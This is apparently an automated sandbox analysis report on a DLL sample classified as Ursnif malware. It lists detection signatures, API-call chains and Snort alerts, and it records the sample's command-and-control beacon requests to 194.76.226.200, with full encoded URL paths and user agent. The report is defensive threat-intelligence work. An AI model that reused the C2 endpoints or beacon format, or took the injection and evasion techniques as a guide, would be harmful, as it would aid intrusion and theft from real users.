Windows Analysis Report
61f113091fd0c.dll

Overview

General Information

Sample Name:	61f113091fd0c.dll
Analysis ID:	560270
MD5:	687f33ac9cb2e8b3c1e7659422caf253
SHA1:	472513fe01ecbc2f51d70d762c1992a4a24c6c15
SHA256:	d1ca0d9f10382d484d02e90d4d5d987653de42a8c4eb5544e4368e4f1965803c
Tags:	dllexeTNT
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Sigma detected: Windows Shell File Write to Suspicious Folder

Maps a DLL or memory area into another process

Writes to foreign memory regions

Changes memory attributes in foreign processes to executable or writable

Writes or reads registry keys via WMI

Sigma detected: Suspicious Remote Thread Created

Machine Learning detection for sample

Allocates memory in foreign processes

Self deletion via cmd delete

Sigma detected: MSHTA Spawning Windows Shell

Injects code into the Windows Explorer (explorer.exe)

Sigma detected: Suspicious Call by Ordinal

Sigma detected: Accessing WinAPI in PowerShell. Code Injection.

Modifies the context of a thread in another process (thread injection)

Sigma detected: Mshta Spawning Windows Shell

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Writes registry values via WMI

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Sigma detected: Suspicious Rundll32 Activity

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains an invalid checksum

Searches for the Microsoft Outlook file path

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Registers a DLL

Sigma detected: Suspicious Csc.exe Source File Folder

PE / OLE file has an invalid certificate

Compiles C# or VB.Net code

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection

Machine Learning detection for sample

Source: 61f113091fd0c.dll

Joe Sandbox ML: detected

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C178F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	1_2_01C178F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F78F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	3_2_031F78F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010578F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	5_2_010578F2

Compliance

Uses 32bit PE files

Source: 61f113091fd0c.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_046CB190
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046CB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_046CB2F7
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_046DD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_046DD39D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04BCB190
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BCB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_04BCB2F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04BDD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_04BDD39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	4_2_05EAB190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EBD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	4_2_05EBD39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05EAB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	4_2_05EAB2F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	5_2_0511B190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0512D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	5_2_0512D39D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0511B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	5_2_0511B2F7

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_046DFD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

1_2_046DFD82

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49749 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49749 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49753 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49753 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 194.76.226.200:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 194.76.226.200 80

Jump to behavior

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/6Ff.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/1sAtgPIBWWyXis_2FA/6GIdiDz41/F8DsJCsC5dAiiAp40xO_/2FPXx_2BF1qO46g3cTx/u5HuMo3uztxcUiL23t82FF/kkG2LxXPj08tg/H_2BJGnO/cP97dD1bDaB8ARH5ISgaEh8/3o1VSIlvAE/fAY7fRQsRaiXUwpok/xVsDrvhLU9b_/2FX5Wo3hVjQ/iMxJEhzERdYzAI/_2F44rqzPuWQ9p1F4Yhmb/gVtKSgiFTUu0Sz_2/FYShPBpN48b/U_2FavA.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/rBML1rj8uElJfatm/1XUPHcYedh6XQNG/RfzcEZujO75haDUuMp/MBSLanUya/vTUM6CjwjVB_2F1X1CjS/LV0aTkXgDCKfXT831Mw/iqWmLrFI0W1nnldmY0nQOm/5tR5VYVCXmkqO/7H59YBEK/Qx8N4StPVj2TG0lcxpPmDMJ/os_2F27yzy/K94E3NnjB3SOalL_2/B5phCQkfkmoU/vGkUfmn2z2D/bI_2FkP7bk5mb4/JjP_2B8QttRH66r/R92.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200

Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200

Source: rundll32.exe, 00000005.00000003.370229041.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359952251.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/
Source: rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/BFA
Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/M
Source: regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517659342.0000000003366000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509976865.0000000003365000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQ
Source: rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7o
Source: rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7
Source: rundll32.exe, 00000004.00000003.498230498.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.501303183.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370021803.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.492598274.000000000334C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2
Source: regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.455323184.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369984660.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.377995492.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370736474.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499574749.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509029101.0000000003392000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.518096997.0000000003392000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFd
Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.76.226.200/mA
Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/
Source: rundll32.exe, 00000004.00000003.356735881.0000000003341000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.358273332.0000000003341000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/KsjuChW1FlW/h0G2ROzQWge1fX/1C6hndXvCTbmXNKw7e4fr/CwqIDwnvxPyopc2J/
Source: regsvr32.exe, 00000003.00000003.363439458.000000000338B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.363565997.000000000338C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/tFFub3t73gQJ78QDkLr4/gr_2B_2BUJEeehBUVBY/ao0x4PCINZAsF2guaBcZS9/2c
Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
